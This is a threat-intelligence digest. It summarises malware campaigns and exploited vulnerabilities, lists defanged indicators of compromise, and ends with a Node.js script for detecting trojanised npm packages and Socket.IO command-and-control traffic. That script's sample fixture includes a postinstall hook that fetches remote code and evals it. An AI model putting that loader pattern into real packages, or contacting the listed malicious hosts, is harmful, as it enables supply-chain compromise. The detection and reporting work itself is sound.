Full Report
This is a weekly threat intelligence report review from RST Cloud. This week, we analyzed 32 threat intelligence reports and compiled a concise summary of each, along with pertinent metadata that was extracted. You can find below a short summary of 10 reports, related threats, tools, threat actors, a link to the source, and a number of extracted indicators of compromise (IoCs) from the original reports. More granular information, including TTPs, on all reports is available via RST Report Hub.

Title: OtterCookie, a new malware used by Contagious Interview
Link: https://jp.security.ntt/tech_blog/contagious-interview-ottercookie
Summary: The Contagious Interview attack campaign, attributed to North Korea and reported by Palo Alto Networks in November 2023, is financially motivated and targets a broad range of victims, notably impacting Japanese organizations. The campaign has evolved to include new malware named OtterCookie, which emerged in November 2024 and shows different functionality and behavior compared to earlier iterations. OtterCookie communicates over Socket.IO and includes features for executing commands and extracting sensitive information, such as cryptocurrency wallet keys; its loaders execute JavaScript code retrieved from various sources, including Node.js projects and npm packages. The evolving nature of the malware indicates a pattern of experimentation by the attackers, emphasizing the need for vigilance in light of the reported incidents.
Threats: contagious_interview_campaign ottercookie beavertail invisibleferret
Indicators of compromise:
ip: 45[.]159[.]248[.]55
domain: zkservice[.]cloud, w3capi[.]marketing, payloadrpc[.]com
hash:
- sha256=d19ac8533ab14d97f4150973ffa810e987dea853bb85edffb7c2fcef13ad2106
- sha256=7846a0a0aa90871f0503c430cc03488194ea7840196b3f7c9404e0a536dbb15e
- sha256=4e0034e2bd5a30db795b73991ab659bda6781af2a52297ad61cae8e14bf05f79
- sha256=32257fb11cc33e794fdfd0f952158a84b4475d46f531d4bee06746d15caf8236

Title: How Attackers Exploit Patched Vulnerability in FortiClient EMS
Link: https://securelist.ru/patched-forticlient-ems-vulnerability-exploited-in-the-wild/111437
Summary: Kaspersky Lab's Global Emergency Response Team (GERT) identified a cyber threat exploiting vulnerability CVE-2023-48788 in FortiClient EMS, affecting versions 7.0.1 through 7.0.10 and 7.2.0 through 7.2.2, due to improper filtering of SQL command input that allows SQL injection attacks. The investigation revealed that attackers targeted a Windows server used by an organization for policy downloads and VPN access, deploying remote management tools such as ScreenConnect and AnyDesk to execute arbitrary commands and conduct lateral movement. Evidence from system logs indicated malicious SQL injection activity and highlighted the attackers' method of using base64-encoded URLs to download and execute tools, with telemetry data showing multi-regional targeting concentrated in South America and an IP linked to a Russian region.
Threats: screenconnect_tool anydesk_tool netscan_tool cobalt_strike lockbit conti connectwise_tool mimikatz_tool mimik_tool
Indicators of compromise:
ip: 45[.]141[.]84[.]45, 185[.]216[.]70[.]170:1337
domain: infinity[.]screenconnect[.]com, kle[.]screenconnect[.]com, trembly[.]screenconnect[.]com, corsmich[.]screenconnect[.]com

Title: Botnets Continue to Target Aging D-Link Vulnerabilities
Link: https://www.fortinet.com/blog/threat-research/botnets-continue-to-target-aging-d-link-vulnerabilities
Summary: FortiGuard Labs reported a rise in activity from two botnets, "FICORA" and "CAPSAICIN," in October and November 2024, targeting D-Link devices vulnerable through the Home Network Administration Protocol (HNAP). "FICORA," traced back to servers in the Netherlands, uses a shell script to execute DDoS attacks and employs a Mirai variant, while "CAPSAICIN" is particularly active in East Asia and uses scripts to connect to control servers for various remote commands. Both botnets exploit several known vulnerabilities, underscoring the ongoing risk posed by unpatched devices.
Threats: ficora capsaicin mirai kaiten udpflood_technique yakuza keksec_group
Indicators of compromise:
ip: 185[.]191[.]126[.]213, 185[.]191[.]126[.]248, 87[.]10[.]220[.]221, 192[.]110[.]247[.]46, 103[.]149[.]87[.]69, 87[.]11[.]174[.]141, 45[.]86[.]86[.]60, 194[.]110[.]247[.]46
domain: ru[.]coziest[.]lol, f[.]codingdrunk[.]cc, www[.]codingdrunk[.]in, le[.]codingdrunk[.]in, pirati[.]abuser[.]eu

Title: Rhadamanthys Stealer Spoofs Emails to Attack Switzerland and the United Kingdom
Link: https://www.forcepoint.com/blog/x-labs/rhadamanthys-stealer-phishing-switzerland-united-kingdom
Summary: Lydia's blog post discusses the emerging threat of XWorm malware in the hospitality sector, while X-Labs has identified the Rhadamanthys infostealer as a concurrent threat targeting businesses in Switzerland and the UK, especially hotels and restaurants. This infostealer uses social engineering through malicious emails that appear to come from Booking.com, with PDF attachments designed to trick users into executing harmful JavaScript code. The campaign demonstrates sophisticated obfuscation methods that complicate detection, and leverages typo-squatted domains and cloud services to evade security measures and exfiltrate sensitive information over established connections to a command-and-control server.
Threats: rhadamanthys xworm_rat agent_tesla typosquatting_technique dotnet_reactor_tool
Indicators of compromise:
ip: 185[.]196[.]8[.]68, 185[.]196[.]11[.]18
domain: b00king[.]biz, b00king[.]network
url: https://11decmain[.]blogspot[.]com/////////////loraaaa[.]pdf, https://bitbucket[.]org/!api/2[.]0
hash:
- sha1=64cd7a0416f33a5e45dbc4b2c7ec5057e0acb21b

Title: Analysis of attack cases targeting domestic solutions of Andariel Group (SmallTiger)
Link: https://asec.ahnlab.com/ko/85270
Summary: The Andariel group has been targeting domestic (South Korean) companies' software, particularly asset management and data leak prevention solutions, exploiting various vulnerabilities to install malware, primarily SmallTiger. The attackers hijack control servers and use indiscriminate and dictionary attacks against exposed update servers to replace legitimate programs with malicious ones. Their tactics include enabling Remote Desktop Protocol (RDP) access to infected systems and installing additional tools; their command-and-control server has been identified, highlighting their ongoing focus on exploiting vulnerabilities in domestic solutions.
Threats: andariel_group smalltiger modeloader advanced-port-scanner_tool netstat_tool
Indicators of compromise:
ip: 20[.]20[.]100[.]32, 45[.]61[.]148[.]153
url: http://45[.]61[.]148[.]153/pizza[.]jsp
hash:
- md5=3525a8a16ce8988885d435133b3e85d8
- md5=45ef2e621f4c530437e186914c7a9c62
- md5=6a58b52b184715583cda792b56a0a1ed
- md5=b500a8ffd4907a1dfda985683f1de1df

Title: XWorm Malware Targets United Kingdom's Hospitality Sector
Link: https://www.forcepoint.com/blog/x-labs/xworm-malware-targets-united-kingdom-hospitality-sector
Summary: XWorm is a sophisticated Remote Access Tool (RAT) offered as Malware-as-a-Service (MaaS) on darknet forums, recently uncovered by X-Labs through a phishing campaign targeting the UK hospitality industry. The campaign involves emails masquerading as communications from Booking.com, leading recipients to a malicious website that hosts obfuscated scripts designed to deploy the XWorm malware. These scripts, which clear the DNS cache to conceal activity, deploy payloads while evading detection through techniques such as modifying the hex entries of PE files and creating autorun registry keys to maintain persistence. The malware's stealthy mechanisms and use of PowerShell scripts highlight its advanced capabilities and the challenges in detecting such attacks.
Threats: xworm_rat confuser_tool
Indicators of compromise:
ip: 92[.]255[.]57[.]155
url: https://extraguestreview[.]com#3Vrn_OYy, http://92[.]255[.]57[.]155/1/1[.]png, http://92[.]255[.]57[.]155/1, http://92[.]255[.]57[.]155/Capcha[.]html, http://92[.]255[.]57[.]155/1/2[.]png
hash:
- sha256=6c327eec94240fa4d1b7141396a7a1e01d76120ab7fca9ae38e5202ce2e916f9
- sha256=ffac95298176d8441ae088c6d5e95b0892afa9768876d3c749404eb31d4b4b6a

Title: ICS Threat Analysis: New, Experimental Malware Can Kill Engineering Processes
Link: https://www.forescout.com/blog/ics-threat-analysis-new-experimental-malware-can-kill-engineering-processes
Summary: Recent incidents have revealed multiple malware threats targeting engineering workstations within Operational Technology/Industrial Control Systems (OT/ICS) environments, including samples such as test.exe, Isass.exe, and a new strain called Chaya_003, which can disrupt Siemens processes. The report highlights ongoing infections by the Ramnit worm affecting Mitsubishi and Siemens systems, along with OT-specific malware such as FrostyGoop and BUSTLEBERM. Additionally, automated botnets such as Aisuru, Kaiten, and Gafgyt have been identified exploiting default credentials to access OT devices and potentially erase sensitive data directories. The SANS Institute's findings further emphasize compromised engineering workstations as a significant attack vector in OT incidents, and a YARA rule was developed to aid detection of malicious interactions with engineering software linked to these threats.
Threats: ramnit chaya_003 frostygoop aisuru kaiten bashlite phoenix_keylogger zeus bumblebee sality virut expiro jeefo neshta parite floxif upx_tool chaya_002_group asyncrat wacapew
Indicators of compromise:
domain: 432i[.]com, az-security[.]info, 0g0d[.]com, grpaper[.]com, x86assembly[.]xyz

Title: DarkVision RAT: A Persistent Threat Delivered via PureCrypter
Link: https://socradar.io/darkvision-rat-a-threat-delivered-via-purecrypter
Summary: The DarkVision RAT malware campaign, which uses the PureCrypter loader, presents a significant threat to sectors including finance, healthcare, and government. Delivered through phishing, this Remote Access Trojan employs sophisticated obfuscation to evade detection and gives attackers remote access for activities such as keylogging, screen and audio capture, and system manipulation. The infection begins with the loader decrypting the RAT, which then relies on techniques such as API calls and process injection, with Command and Control communications conducted over non-standard ports, complicating detection efforts.
Threats: darkvisionrat purecryptor process_injection_technique
Indicators of compromise:
domain: severdops[.]ddns[.]net:8120
url: http://nasyiahgamping[.]com/yknoahdrv[.]exe
hash:
- sha256=cd64122c8ee24eaf02e6161d7b74dbe79268f3b7ffb7a8b0691a61ff409f231d
- sha256=27ccb9f336282e591e44c65841f1b5bc7f495e8561349977680161e76857be5d
- sha256=7aa49795bbe025328e0aa5d76e46341a95255e13123306311671678fdeabb617

Title: Strela Stealer Targeting Ukraine Alongside Other European Countries
Link: https://www.sonicwall.com/blog/strela-stealer-targeting-ukraine-alongside-other-european-countries
Summary: The SonicWall Capture Labs threat research team is monitoring an updated variant of the Strela Stealer malware, which has been active throughout 2024. This variant not only targets email credentials from Outlook and Thunderbird but also gathers system configuration details using the "systeminfo" utility. The infection process begins with a JavaScript attachment in phishing emails, leading to a PowerShell script that executes a primary DLL whose payload is protected with a customized XOR decryption routine. The malware features enhanced obfuscation techniques that complicate analysis, and its targeting now includes Ukraine in addition to its original focus on European countries such as Spain, Italy, and Germany.
Threats: strela_stealer junk_code_technique
Indicators of compromise:
ip: 94[.]159[.]113[.]204
url: http://94[.]159[.]113[.]204/up[.]php
hash:
- sha256=d27a551d2236b3b36b0fcf5c4caa42fc209ec6aeb1d8971c9b0e91892aca1ca2
- sha256=0ad95c8780adfa4271d2a9c910d83368513c5c95536b82b5bd098f1d0a74075c
- sha256=48211afd43defedfee988ddd61304c263713532df59354592930de28806d0fd5

Title: Exposing the Steps of the Kimsuky APT Group
Link: https://www.picussecurity.com/resource/blog/exposing-the-steps-of-the-kimsuky-apt-group
Summary: Kimsuky, or Black Banshee, is a North Korean cyber threat group that has been active since at least 2013, focusing on espionage against political, military, and economic organizations, particularly in South Korea, the U.S., Japan, Russia, and Europe. The group has evolved from basic social engineering to advanced cyber tools such as RandomQuery, xRAT, and Gold Dragon, conducting multi-stage attacks for intelligence gathering. Notable campaigns include the 2020 attacks on U.S. defense contractors and the DEEP#GOSU operation in 2024, which demonstrated techniques such as spear phishing, malware deployment, credential access, and sophisticated command and control methods, all indicating a strong alignment with geopolitical objectives rather than financial gain.
Threats: kimsuky_group gold_dragon randomquery xrat_rat deep_gosu_campaign trurat spear-phishing_technique lolbin_technique process_injection_technique metasploit_tool credential_dumping_technique procdump_tool credential_harvesting_technique babyshark powershell_keylogger_tool mechanical_keylogger sniffpass_tool cryptojacker teamviewer_tool
Indicators of compromise:
url: https://niscarea[.]com, http://00701111[.]000webhostapp[.]com/wp-extra/show[.]php?query=50

This article was generated with the assistance of an artificial intelligence language model, ChatGPT.
Analysis Summary
# Threat Actor: Contagious Interview
## Attribution & Identity
* **Attribution:** Attributed to North Korea.
* **Associated Groups/Campaigns:** Uses the malware family "OtterCookie" as part of the "Contagious Interview" attack campaign.
## Activity Summary
The "Contagious Interview" campaign, active since at least November 2023, is financially motivated and has recently evolved to incorporate the malware "OtterCookie" (emerging November 2024). This evolution suggests continuous experimentation by the threat actors. The campaign targets a broad range of victims, with a notable impact observed on Japanese organizations.
## Tactics, Techniques & Procedures
* **Execution:** Loaders execute JavaScript code retrieved from external sources.
* **Command and Control (C2):** C2 communication is carried over Socket.IO.
* **Exfiltration:** Capability to extract sensitive information, specifically crypto wallet keys.
## Targeting
* **Sectors:** Broad range of victims, notably impacting Japanese organizations.
* **Geography:** Japan (specifically noted as notably impacted).
* **Victims:** Not specifically named, but organizations in Japan are highlighted.
## Tools & Infrastructure
* **Malware families used:** OtterCookie (new iteration).
* **Infrastructure (C2, domains, IPs):**
  * IP: `45[.]159[.]248[.]55`
  * Domains: `zkservice[.]cloud`, `w3capi[.]marketing`, `payloadrpc[.]com`
* **Other Components:** Loads malware via JavaScript code sourced from Node.js projects and npm packages.
## Implications
The emergence of OtterCookie demonstrates the threat actor's willingness to pivot and experiment with new malware functionalities, even while continuing a financially motivated campaign. The specific focus on extracting cryptocurrency wallet keys indicates a direct monetary objective, posing a significant risk to organizations holding digital assets. The targeting of Japanese entities suggests continued focus on specific regional economies.
## Mitigations
* Monitor network traffic for Socket.IO sessions to destinations outside the expected set of internal and SaaS endpoints; such connections can indicate C2 activity.
* Scrutinize supply chain dependencies, particularly Node.js projects and npm packages, for embedded or dynamically loaded JavaScript code.
* Enhance endpoint detection capabilities to identify the execution of malicious JavaScript payloads.
* Maintain vigilance against evolving financially motivated campaigns originating from known nation-state actors targeting local interests.
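The two checks below illustrate the first two mitigations in Node.js: an audit of an npm package for install-time hooks and fetch-then-execute JavaScript, and a filter over proxy logs for Socket.IO handshakes to unexpected hosts. This is an added example, not code from RST Cloud, NTT or the OtterCookie report; the regexes, the package manifest, the file contents and the log lines are constructed by the editor and are not indicators from the report.

```javascript
// Added example for the mitigations above (editor's own code). The patterns, file names and
// log lines are constructed assumptions about what a trojanised npm package and Socket.IO
// C2 traffic look like; none of them come from the OtterCookie report.

// ---- 1. npm package audit: loaders that run JavaScript fetched at install time ----
// Lifecycle hooks execute automatically on `npm install`, so that is where a loader hides.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];
// A hook that shells out to the interpreter or a downloader instead of a build step.
const SUSPICIOUS_HOOK = /\b(node\s+-e|curl|wget|powershell)\b/;
// Source that fetches content and then executes it as code (fetch + eval in one file).
const DYNAMIC_EXEC = /\b(eval|new\s+Function|vm\.runInThisContext|vm\.runInNewContext)\s*\(/;
const REMOTE_FETCH = /\b(https?\.get|fetch|axios\.get)\s*\(/;
// Libraries that give a package a ready-made C2 channel; a weak signal on its own.
const C2_CAPABLE_LIBS = new Set(["socket.io-client"]);

function auditPackage(manifest, sources) {
  const findings = [];
  const scripts = manifest.scripts || {};
  for (const hook of INSTALL_HOOKS) {
    if (scripts[hook] && SUSPICIOUS_HOOK.test(scripts[hook])) findings.push(`lifecycle:${hook}`);
  }
  const deps = { ...(manifest.dependencies || {}), ...(manifest.devDependencies || {}) };
  for (const name of Object.keys(deps)) {
    if (C2_CAPABLE_LIBS.has(name)) findings.push(`dependency:${name}`);
  }
  for (const [file, code] of Object.entries(sources)) {
    if (DYNAMIC_EXEC.test(code) && REMOTE_FETCH.test(code)) findings.push(`fetch-then-exec:${file}`);
  }
  return findings;
}

// ---- 2. Socket.IO handshakes in proxy logs to hosts not expected to serve it ----
// Engine.IO, the transport under Socket.IO, opens a session with
// GET /socket.io/?EIO=<version>&transport=polling|websocket. Matching on that handshake
// catches session setup regardless of what the application-level messages contain.
const SOCKET_IO_TRANSPORTS = new Set(["polling", "websocket"]);

function flagSocketIoHandshakes(logLines, allowedHosts) {
  const hits = [];
  for (const line of logLines) {
    // Constructed log format: "<timestamp> <client-ip> <method> <url> <status>"
    const [ts, client, , url] = line.trim().split(/\s+/);
    if (!url) continue;
    let u;
    try { u = new URL(url); } catch { continue; }           // skip malformed lines
    if (!u.pathname.startsWith("/socket.io/")) continue;
    if (!u.searchParams.has("EIO")) continue;
    if (!SOCKET_IO_TRANSPORTS.has(u.searchParams.get("transport"))) continue;
    if (allowedHosts.has(u.hostname)) continue;               // known internal/SaaS endpoint
    hits.push({ ts, client, host: u.hostname, transport: u.searchParams.get("transport") });
  }
  return hits;
}

// ---- Constructed sample input (not real packages, hosts or traffic) ----
const SAMPLE_MANIFEST = {
  name: "coding-assessment-helper",
  version: "1.0.3",
  scripts: { test: "jest", postinstall: "node -e \"require('./lib/setup.js')\"" },
  dependencies: { "socket.io-client": "^4.7.0", express: "^4.19.0" },
};
const SAMPLE_SOURCES = {
  "lib/setup.js":
    "const https = require('https');\n" +
    "https.get(process.env.CFG_URL, (r) => { let b = ''; r.on('data', (d) => (b += d)); r.on('end', () => eval(b)); });",
  "lib/util.js": "module.exports = { sum: (a, b) => a + b };",
};
const SAMPLE_PROXY_LOG = [
  "2024-11-20T10:02:11Z 10.0.4.17 GET https://chat.corp.example/socket.io/?EIO=4&transport=polling&t=OzP 200",
  "2024-11-20T10:02:13Z 10.0.4.17 GET https://unknown-host.example/socket.io/?EIO=4&transport=polling&t=OzQ 200",
  "2024-11-20T10:02:14Z 10.0.4.17 GET wss://unknown-host.example/socket.io/?EIO=4&transport=websocket&sid=abc 101",
  "2024-11-20T10:02:15Z 10.0.4.22 GET https://registry.npmjs.org/lodash 200",
  "garbled line without a url",
];
const ALLOWED_SOCKET_IO_HOSTS = new Set(["chat.corp.example"]);

if (typeof require !== "undefined" && require.main === module) {
  console.log(auditPackage(SAMPLE_MANIFEST, SAMPLE_SOURCES));
  console.log(flagSocketIoHandshakes(SAMPLE_PROXY_LOG, ALLOWED_SOCKET_IO_HOSTS));
}
```

Both checks are heuristics: a legitimate chat client also depends on `socket.io-client` and also opens Engine.IO handshakes, so the allowlist and the combination of signals (install hook plus fetch-then-exec plus an unexpected destination) carry the decision, not any single match.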